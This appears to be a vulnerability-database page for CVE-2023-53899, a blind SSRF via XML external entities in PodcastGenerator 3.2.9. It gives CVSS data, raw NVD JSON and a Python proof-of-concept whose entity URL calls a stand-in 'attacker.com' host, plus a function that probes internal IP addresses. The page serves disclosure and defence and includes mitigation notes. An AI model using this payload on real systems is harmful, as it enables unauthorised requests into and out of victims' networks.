Security Vulnerability Report
CVE-2023-53899 CVSS 9.8 CRITICAL

CVE-2023-53899

Published: 2025-12-16 17:16:02
Last Modified: 2026-04-29 01:00:02

Description

PodcastGenerator 3.2.9 contains a blind server-side request forgery vulnerability that allows attackers to inject XML in the episode upload form. Attackers can manipulate the 'shortdesc' parameter to trigger external HTTP requests to arbitrary endpoints during podcast episode creation.

CVSS Details

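CVSS Score
9.8 (CVSS 3.1)
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Note: the raw record at the bottom of this page also carries a CVSS 4.0 assessment of 5.1 MEDIUM whose vector sets PR:H (high privileges required). The two assessments disagree on whether authentication is needed, so check how the episode upload form is exposed in your own deployment before prioritising on the 9.8 figure alone.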

Configurations (Affected Products)

cpe:2.3:a:podcastgenerator:podcast_generator:3.2.9:*:*:*:*:*:*:* - VULNERABLE
PodcastGenerator 3.2.9 and earlier versions (the CPE entry above lists 3.2.9 only)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
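import requests
import sys

# CVE-2023-53899 PoC - PodcastGenerator Blind SSRF via XML Injection
# Target: PodcastGenerator 3.2.9
# Vulnerability: Blind SSRF through shortdesc parameter in episode upload form
#
# NOTE(review): nothing on this page shows this script being run against a
# real install. The endpoint path, form field names and payload shape are
# reproduced as published and should be treated as unverified.
# NOTE(review): no session or credentials are sent, while the CVSS 4.0 vector
# in this page's raw record lists PR:H. The HTTP status printed below is
# therefore not evidence of exposure in either direction.
# For defenders: the observable is an outbound HTTP request from the web
# server to a host named inside a submitted description field. Disabling
# external entity resolution in the XML parser, escaping form input before it
# is written into XML, and egress filtering are the usual mitigations for this
# class of bug (CWE-918); which of them applies to this application is not
# shown on this page.


def exploit_blind_ssrf(target_url, attacker_domain):
    """Post one episode-upload form whose 'shortdesc' field carries an XML
    document declaring an external entity.

    Args:
        target_url: Base URL of the PodcastGenerator instance under test.
        attacker_domain: Host name placed in the entity's SYSTEM URL. Because
            the issue is blind, any fetch would only be visible in that
            host's own logs.

    Returns:
        bool: True if the HTTP request completed, False if ``requests``
        raised. True does not mean the entity was resolved; the response is
        never inspected for that.
    """
    # Trailing slashes are stripped so the path is not doubled.
    upload_endpoint = f"{target_url.rstrip('/')}/admin/episodes.php"

    # XML document with one external entity referenced from <shortdesc>.
    # NOTE(review): this is a complete document (prolog + DOCTYPE) placed
    # inside a form field; whether the application ever parses the field that
    # way is not established here.
    xml_payload = f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE episode [
<!ENTITY xxe SYSTEM "http://{attacker_domain}/ssrf-test">
]>
<episode>
<title>Malicious Episode</title>
<shortdesc>&xxe;</shortdesc>
<longdesc>Test episode for CVE-2023-53899</longdesc>
</episode>'''

    # (None, value) tuples make requests send plain multipart form fields;
    # only 'file' is sent as a file part.
    files = {
        'episodetitle': (None, 'CVE-2023-53899 Test Episode'),
        'shortdesc': (None, xml_payload),
        'longdesc': (None, 'Testing blind SSRF vulnerability'),
        'file': ('test.mp3', b'fake audio content', 'audio/mpeg'),
    }

    try:
        # verify=False turns TLS certificate checking off for this call only
        # (check_internal_service keeps the default), so the identity of the
        # answering host is not authenticated.
        response = requests.post(
            upload_endpoint,
            files=files,
            timeout=10,
            verify=False,
        )
    except requests.exceptions.RequestException as e:
        print(f"[-] Error sending exploit: {e}")
        return False

    print(f"[+] Exploit request sent to {upload_endpoint}")
    print(f"[+] Payload length: {len(xml_payload)} bytes")
    print(f"[+] Status code: {response.status_code}")
    return True


def check_internal_service(target_url, internal_ip, internal_port):
    """Post an upload form whose entity URL points at an internal address.

    This function is defined but never called from the ``__main__`` block.

    Args:
        target_url: Target PodcastGenerator URL.
        internal_ip: Internal IP address placed in the entity URL.
        internal_port: Internal port placed in the entity URL.

    Returns:
        None. The outcome is only printed.
    """
    internal_url = f"http://{internal_ip}:{internal_port}"

    xml_payload = f'''<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY ssrf SYSTEM "{internal_url}">
]>
<data>&ssrf;</data>'''

    files = {
        'episodetitle': (None, 'Internal Scan'),
        'shortdesc': (None, xml_payload),
        'longdesc': (None, 'Internal service probe'),
        'file': ('probe.mp3', b'probe', 'audio/mpeg'),
    }

    try:
        # Same trailing-slash handling as exploit_blind_ssrf, so both
        # functions build the endpoint identically.
        response = requests.post(
            f"{target_url.rstrip('/')}/admin/episodes.php",
            files=files,
            timeout=5,
        )
        # NOTE(review): this status code is the target's answer to the
        # upload, not the internal service's; with a blind issue it says
        # nothing about whether internal_url was reached.
        print(f"[*] Probed {internal_url} - Response: {response.status_code}")
    except requests.exceptions.RequestException:
        # Narrowed from a bare ``except:`` so Ctrl-C and SystemExit are no
        # longer swallowed. An exception here means the request to the target
        # failed; the message text is kept as published.
        print(f"[*] Probed {internal_url} - No response (may be filtered)")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2023-53899-poc.py <target_url> <attacker_domain>")
        print("Example: python cve-2023-53899-poc.py http://podcast.example.com attacker.com")
        sys.exit(1)

    target = sys.argv[1]
    attacker = sys.argv[2]

    print("="*60)
    print("CVE-2023-53899 PoC - PodcastGenerator Blind SSRF")
    print("="*60)

    exploit_blind_ssrf(target, attacker)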

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53899", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:02.213", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PodcastGenerator 3.2.9 contains a blind server-side request forgery vulnerability that allows attackers to inject XML in the episode upload form. Attackers can manipulate the 'shortdesc' parameter to trigger external HTTP requests to arbitrary endpoints during podcast episode creation."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:podcastgenerator:podcast_generator:3.2.9:*:*:*:*:*:*:*", "matchCriteriaId": "C9656104-821D-4468-A1B3-2536CC9C912C"}]}]}], "references": [{"url": "https://github.com/PodcastGenerator/PodcastGenerator", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://podcastgenerator.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51565", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/podcastgenerator-blind-server-side-request-forgery-via-xml-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}